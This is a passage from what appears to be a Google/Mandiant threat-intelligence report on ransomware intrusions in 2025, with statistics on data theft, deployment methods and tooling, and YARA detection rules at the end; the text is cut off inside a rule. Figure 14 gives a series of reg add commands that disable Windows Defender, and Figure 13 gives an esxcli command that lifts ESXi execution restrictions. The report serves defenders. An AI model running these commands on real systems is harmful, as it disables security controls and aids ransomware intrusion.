center;"><span style="vertical-align: baseline;">CLOP</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">CONTI</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">CRYTOX</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">DOLLARLOCKER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">FOULFOG.LINUX</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">INC</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">INC.LINUX</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">INTERLOCK</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">LOCKBIT.UNIX</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">LOCKBIT.WARLOCK</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">MEDUSALOCKER.V2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">NINTHBEE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">NITROGEN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">ODDSIDE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">PLAYCRYPT</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">RANSOMHUB</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">REDBIKE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">RHYSIDA</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">RIFTTEAR</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">SAFEPAY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">SILVERPINE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">WHITERABBIT</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 3: Ransomware families observed in Mandiant's 2025 incident response investigations</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Data Exfiltration</span></h4> <p><span style="vertical-align: baseline;">In 2025, we observed confirmed or suspected data theft in approximately 77% of ransomware intrusions, a notable increase from approximately 57% in 2024. In these incidents, the most frequently observed strategies for identifying, staging, and exfiltrating data included the use of legitimate data synchronization tools such as Rclone and MEGASync, file compression using built-in tools or portable versions of WinRar or 7Zip, and FTP clients such as Filezilla or Winscp.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During intrusions where data was stolen, we routinely observed threat actors targeting a variety of sensitive data types, including legal, human resources, accounting, and business development data.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed evidence of threat actors conducting manual reconnaissance of systems likely to gather sensitive data for exfiltration such as accessing emails and attempting to access SharePoint and other Microsoft 365 environments via the browser.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In 2025, threat actors continued to rely on publicly available tools and utilities—including Rclone, MEGASync, Megatools, restic, and possibly Cyberduck—to exfiltrate data.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed Rclone in approximately 28% of intrusions where data theft was confirmed or suspected to exfiltrate data to attacker-controlled infrastructure.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In one INC ransomware incident, the threat actor used the wget and curl commands to download Rclone and an INC.LINUX ransomware payload respectively to a network-attached storage (NAS) server. The threat actor subsequently ran Rclone to exfiltrate data from the server prior to manually executing the INC.LINUX payload.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors installed and/or leveraged legitimate FTP/SFTP clients in 26% of intrusions where data theft was observed or suspected. Commonly observed software included FileZilla, WinSCP, and PuTTY Secure Copy.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">While not confirmed to be used for data exfiltration, we observed threat actors installing and/or executing various utilities that could be used to aid in the reconnaissance, staging, and export of stolen data such as Total Commander, Xcopy, and Gpg4win.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors leveraged a myriad of legitimate cloud services and infrastructure to exfiltrate stolen data, including Azure, AWS, Backblaze, Cloudzy, Filemail, Google Drive, and MEGA, and OneDrive.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In one UNC5471 intrusion leading to AGENDA ransomware, the threat actor leveraged batch scripts alongside WinRAR to automate the archiving of files in directories. The actor then used Megatools and SLEETSEND to exfiltrate the data to the MEGA and Cloudzy cloud storage services.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed multiple threat actors transferring stolen data to attacker-controlled OneDrive accounts. During one UNC5496 intrusion, the threat actor ran commands to have Rclone transfer all files that matched a list of common file extension types to a threat actor-controlled OneDrive account.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In multiple incidents, we observed threat actors leveraging AzCopy to transfer stolen files to attacker-controlled Azure storage.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During one UNC6098 intrusion, the threat actor leveraged the SQL Server Import and Export Wizard to export a SQL database.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Ransomware Deployment</span></h4> <p><span style="vertical-align: baseline;">We observed a diverse set of ransomware deployment techniques leveraged in intrusions throughout 2025. Threat actors employed both manual and automated deployment techniques, including the use of batch scripts, scheduled tasks, Group Policy Objects (GPOs), registry keys, and PowerShell scripts. Notably, in almost 20% of incidents, threat actors targeted virtualization infrastructure, and we observed multiple incidents where operators automated portions of their ransomware deployment against ESXi hosts, suggesting techniques used to target virtual systems may be maturing.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors often relied on automated mechanisms to deploy ransomware. In many cases, they relied on native Windows mechanisms to facilitate ransomware execution.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Multiple threat clusters leveraged batch scripts to facilitate ransomware payload execution in victim environments. In one LOCKBIT.WARLOCK intrusion, the threat actor staged NetExec on a domain controller along with files to run the ransomware payload. The threat actor then used NetExec to copy a batch file to numerous hosts via SMB and run it to execute the ransomware payload.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a separate LOCKBIT.WARLOCK intrusion, the threat actor staged ransomware payloads on multiple hosts via SMB before executing them via scheduled tasks.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During a NINTHBEE ransomware incident, the threat actor modified a GPO to include a malicious scheduled task that disabled Windows Defender and subsequently executed the ransomware payload. In the same intrusion, the threat actor also attempted to execute the NINTHBEE payload on multiple remote hosts via PsExec.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In an incident likely involving DOLLARLOCKER, a threat actor created a Windows service to run a command to execute the ransomware payload.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Multiple threat clusters leveraged the Windows Registry to complete their ransomware deployment objectives. During an UNC5471 intrusion, the threat actor created registry Run keys to execute AGENDA ransomware on multiple servers persistently. In one INTERLOCK ransomware intrusion, following encryption, the threat actor modified the LegalNoticeCaption and LegalNoticeText registry values to display a banner indicating the system was ransomed on start up.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In addition to using SMB to stage ransomware payloads, we also observed threat actors leverage SMB to facilitate more expansive ransomware deployment across victim networks. In one incident, actors identified network shares via the "Invoke-ShareFinder" PowerShell cmdlet and likely supplied this list to REDBIKE as a list of targets. Ultimately, encryption was attempted on more than 500 endpoints via SMB.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a small subset of observed intrusions, threat actors leverage PowerShell to automate the deployment of BitLocker encryption across victims' environments. During one intrusion, the threat actor used a PowerShell script to install, configure, and assign passwords for BitLocker on multiple hosts. The threat actor then enabled encryption on multiple drives on these hosts and scheduled a system restart to force the hosts into a locked state. The actor also modified the registry to display a ransom note on the BitLocker preboot recovery screen.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024. While ransomware deployment to virtual systems is often done manually, in 2025 we observed at least some incidents where threat actors attempted to automate portions of the ransomware deployment stage.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During an UNC5495 intrusion, the threat actor automated the deployment of BABUK.MARIO by leveraging a batch script that accepted credentials for ESXi hosts. The batch script used a staged copy of KiTTY to copy the ransomware payload to the host and then connect via SSH and run a command to execute the payload on each host. In a separate intrusion, a threat actor leveraged a PowerShell script to authenticate to the victim's vCenter server, set new root passwords, and enable SSH on ESXi hosts. The same script was used to subsequently copy a RIFTEAR ransomware payload to the hosts, delete backups, shutdown virtual machines (VMs), and disable security policies prior to executing the ransomware payload.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Prior to ransomware deployment on ESXi hosts, threat actors commonly disabled the ExecInstalledOnly setting on hosts to allow for the execution of custom binaries (Figure 13). During one intrusion, the threat actor also accessed a vCenter server and modified the Lockdown Mode Exception Users settings, which controls users that are allowed to maintain privileges when the host is in lockdown mode.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Across multiple intrusions, threat actors took steps to stop virtual machines and unlock files prior to decryption, almost certainly to maximize the impact of their ransomware payloads.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In multiple instances threat actors used or attempted to use IOBIT, a legitimate uninstaller utility, to unlock files in use by other programs prior to executing ransomware payloads.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We also observed multiple actors shutting down virtual machines and deleting backups and snapshots prior to encryption. In at least one intrusion, an actor leveraged a PowerShell script to automate the process of powering off virtual machines.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During one intrusion, the threat actor accessed the victim's Commvault server and deleted vCenter backup volumes prior to encryption to hinder recovery.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">During a TridentLocker-branded ransomware incident, we assess with moderate confidence that the threat actor leveraged the same CrushFTP preview hijacking technique used for WAVECALL persistence to download and execute a ransomware payload from the WAVECALL C2 server.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>esxcli system settings advanced set -o /User/execInstalledOnly -i 0</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 13: Command to disable ExecInstalledOnly setting on ESXi hosts</span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Anti-Detection, Analysis, and Recovery Tactics</span></h4> <p><span style="vertical-align: baseline;">Ransomware actors consistently engage in anti-detection, anti-analysis, and anti-recovery tactics in their operations in an effort to not only prevent detection during the intrusion, but increase the difficulty for victims to recover post-encryption. While these tactics are often manually performed by threat actors, numerous ransomware families feature built-in capabilities to hinder analysis and delete backups prior to encryption.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors consistently disabled and tampered with security controls during ransomware intrusions to avoid detection and/or block of execution of malicious payloads. Most commonly, we observed threat actors disabling Windows Defender, often by modifying the Windows registry. In some other cases, the threat actors modified Defender configurations via the Set-MpPreference PowerShell cmdlet to add exclusions for their malware and ransomware payloads. Threat actors also were observed leveraging GPOs, scheduled tasks, and PowerShell scripts in order to tamper with a variety of security controls.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a REDBIKE incident, threat actors used PowerShell to disable a multitude of Windows Defender features by running commands to modify a variety of values associated with Windows Defender registry keys, including DisableRealtimeMonitoring, DisableScanOnRealtimeEnable, and DisableOnAccessProtection (Figure 14).</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In an intrusion involving WHITERABBIT, threat actors executed a Base64-encoded PowerShell command that used the "Add-MpPreference" cmdlet to modify the Defender Exclusion list to include the ransomware binary; a variety of file extensions, such as ".cmd," ".bat," and ".exe"; as well as User Data folders.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In an incident involving NINTHBEE, threat actors registered a scheduled task to execute daily a command that disables Microsoft Defender's real-time scanning for downloaded files and email attachments.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ransomware actors often deleted artifacts and cleared event logs to remove evidence of their activity. These records included information about command execution, firewall traffic, and stolen credentials. The wevtutil utility was used to facilitate log deletion in multiple instances.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a FOULFOG.LINUX incident, the threat actors renamed the ransomware binary to a less suspicious name, "filerw"; deleted the command history for the system; and created an empty file to replace the deleted file.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In some cases, threat actors used benign names in their operations in an attempt to masquerade as legitimate software or system resources. For example, in a RIFTTEAR incident, threat actors registered a scheduled task named "\Microsoft\Update" to execute a malicious command likely intended to kill endpoint detection and response (EDR) processes. In a separate case involving CONTI, the ransomware binary had its filename renamed from "enc_lin" to "rsync" in an attempt to appear as the native synchronization command-line utility.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ransomware actors often disabled or deleted backups to inhibit and/or limit recovery options. In some cases, threat actors stopped backup servers and/or deleted Volume Shadow Copies (VSS) via PowerShell scripts.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Notably, in a RANSOMHUB incident, the threat actors used the access to Cisco Integrated Management Controller (CIMC) to map a Debian Linux ISO image via Virtual Media across a nine-node Cohesity cluster. By modifying the boot priority and hardware power-cycling, the nodes booted into the external Linux environment, overwriting the Cohesity operating system (OS) and rendering the backup data inaccessible.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In a handful of intrusions, the threat actors used tooling to terminate processes and services associated with security software solutions, specifically those abusing signed kernel mode drivers. Examples include the open-source TERMINATOR and WATCHDOGKILLER, as well as non-publicly available tools such as WARCLAW, a utility that decodes and installs a vulnerable kernel mode driver.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 14: Windows Defender registry key modification</span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Tool Prevalence</span></h4> <p><span style="vertical-align: baseline;">Throughout 2025, we continued to see ransomware actors rely heavily on publicly available tools and legitimate software across various stages of ransomware intrusions. While legitimate software remains popular, we observed a slight decrease in the use of RMM tools and post-exploitation C2 frameworks. Notably, both WinRAR and Rclone were observed in almost one-fourth of incidents, likely corresponding with the increase in incidents involving data theft, given that these tools are regularly used to stage and exfiltrate data respectively.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors used post-exploitation C2 frameworks in about 15% of 2025 ransomware incidents, a decrease from almost 20% in 2024. The decline in the use of post-exploitation frameworks is largely due to the continued reduction in use of Cobalt Strike BEACON.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Cobalt Strike BEACON was deployed in only 2% of 2025 ransomware incidents, continuing a multi-year downward trend; in 2021 roughly 60% of ransomware incidents involved BEACON, dropping to around 38% in 2022, 20% in 2023, and 11% in 2024. This decrease could in part be attributed to some subset of actors exploring new frameworks, like AdaptixC2.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed approximately 8% of intrusions involving the AdaptixC2 (ADAPTAGENT) post-exploitation framework. </span><a href="https://unit42.paloaltonetworks.com/adaptixc2-post-exploitation-framework/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AdaptixC2</span></a><span style="vertical-align: baseline;"> is an open-source post-exploitation framework developed for penetration testers; however, similar to the use of CobaltStrike for many years, threat actors often abuse these types of pentesting tools to facilitate their operations.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Less frequently, we observed the penetration frameworks associated with MYTHICAGENT, METASPLOIT, HAVOC, and EXPLORATIONC2.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Extending a trend identified last year, threat actors appear slightly less reliant on remote management tools. Around 24% of 2025 incidents involved at least one RMM, compared to 28% in 2024, and 40% in 2023.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed 10 unique remote management tools in ransomware incidents in 2025 comparable to nine in 2024, but an overall decrease from 13 in 2023.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We also saw a decrease in instances of threat actors leveraging multiple different RMMs within the same intrusion. In 2025, multiple RMMs were only observed in ~5% of incidents, compared to 8% in 2024, and 16% in 2023.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Consistent with recent years, AnyDesk remained the most commonly deployed RMM in ransomware incidents in 2025; however, overall use decreased from roughly 31% in 2023 and 16% in 2024 to 10% in 2025.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Threat actors' use of tunnelers remained fairly consistent as compared to 2024; however, there were small shifts in the use of specific tunnelers. For example, CLOUDFLARED was observed in 8% of incidents in 2025 compared to around 4% in 2024.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We've observed a negligible decline in the use of SYSTEMBC, with around 14% of incidents involving the tunneler in 2023, a little over 7% in 2024, and down to a little over 6% in 2025. Notably, Operation Endgame </span><a href="https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">disrupted</span></a><span style="vertical-align: baseline;"> SYSTEMBC infrastructure in May 2024; while the malware is still being sold on forums, it's plausible that the law enforcement disruption dissuaded some threat actors from continuing to use the malware in their operations.</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Throughout 2025, threat actors continued to leverage common publicly available network scanning tools such as Advanced IP Scanner and SoftPerfect Network Scanner in around 50% of intrusions, consistent with the 2024 rate.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">In 2025, we observed an increase in the use of public tools like WinRAR and Rclone that are often used by threat actors to facilitate data theft, which aligns with our overall increase in incidents involving suspected or confirmed data theft from 2024 to 2025. Both WinRAR and Rclone were observed in approximately 23% of incidents; in 2024, we observed around 16% of intrusions involving Rclone and only around 8% involving WinRAR.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Remediation and Hardening</span></h3> <p><span style="vertical-align: baseline;">Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span style="text-decoration: underline; vertical-align: baseline;">Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a><span style="vertical-align: baseline;">. </span></p> <h3><span style="vertical-align: baseline;">Outlook and Implications</span></h3> <p><span style="vertical-align: baseline;">Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations. This is likely due to increased difficulty in successful deployments due to victims' improved security postures, a greater refusal to pay ransom demands, and enhanced recovery capabilities. In the coming years, evolving regulations, including reporting requirements and payment bans, may further dissuade some companies from making ransom payments. While we anticipate ransomware to remain one of the most dominant threats globally, the reduction in profits may cause some threat actors to seek other monetization methods. This could manifest as increased data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms such as using compromised infrastructure to send phishing messages.</span></p> <h3><span style="vertical-align: baseline;">Detections</span></h3> <h4><span style="vertical-align: baseline;">YARA Rules</span></h4> <h5><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">AGENDA</span></span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APTFIN_Ransom_AGENDA_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $conf1 = "public_rsa_pem" fullword $conf2 = "private_rsa_pem" fullword $conf3 = "directory_black_list" fullword $conf4 = "file_black_list" fullword $conf5 = "file_pattern_black_list" fullword $conf6 = "process_black_list" fullword $conf7 = "win_services_black_list" fullword $conf8 = "company_id" fullword $conf9 = "note" fullword $load_const1 = { 21 B7 F6 F7 } $load_const2 = { F6 36 A4 69 } $load_s1 = "run_portable_executable" fullword $load_s2 = "MemoryLoadLibrary" fullword $load_s3 = "_ZN9morph_poc4main" $note1 = "Extension: " $note2 = "Domain: " $note3 = "login: " $note4 = "password: " $note5 = "Enter credentials-- Credentials" $note6 = "-- Qilin" $note7 = "-- Recovery" $note8 = "www.torproject.org" $note9 = ".onion" $note10 = "Employees personal data, CVs, DL , SSN." $note11 = "%s/%s_RECOVER.txt" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (7 of ($conf*) or 7 of ($note*) or all of ($load*)) }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">AGENDA.RUST</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Win_Ransomware_AGENDA_RUST_2_MBeta { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $rust = "/rust/" $conf1 = "\"public_rsa_pem\":" $conf2 = "\"private_rsa_pem\":" $conf3 = "\"directory_black_list\":" $conf4 = "\"file_black_list\":" $conf5 = "\"file_pattern_black_list\":" $conf6 = "\"process_black_list\":" $conf7 = "\"win_services_black_list\":" $conf8 = "\"company_id\":" $conf9 = "\"n\":" $conf10 = "\"p\":" $conf11 = "\"fast\":" $conf12 = "\"skip\":" $conf13 = "\"step\":" $conf14 = "\"accounts\":" $conf15 = "\"note\":" condition: uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize &lt; 5MB and (($rust and 8 of ($conf*)) or (13 of ($conf*))) }</code></pre></div> <div class="block-paragraph_advanced"><h5>REDBIKE</h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_REDBIKE_2 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $a1 = ".akira" $a2 = "akira_readme.txt" $a3 = "akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id" $s1 = "--encryption_percent" ascii wide nocase $s2 = "--encryption_path" ascii wide nocase $s3 = "--share_file" ascii wide nocase condition: ((all of ($s*)) and (any of ($a*))) and (uint16(0) == 0x5A4D) and filesize &gt; 500KB and filesize &lt; 2MB }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">REDBIKE.LINUX</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APTFIN_Ransom_REDBIKE_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $a = "akira_readme.txt" $b = "save your TIME, MONEY, EFFORTS" $c = "akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion" $d = "--encryption_percent" $e = "--encryption_path" $f = "--share_file" condition: all of them and (uint32be(0) == 0x7F454C46) }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">CLOP</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_CLOP_rol7XorHash32_ConfigHashes_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $hex_asm_literal_a = { 92 F7 53 7A } $hex_asm_literal_b = { 43 29 79 71 } $hex_asm_literal_c = { 2A 81 C4 E2 } $hex_asm_literal_d = { 2E F4 FA 7E } $hex_asm_literal_e = { 31 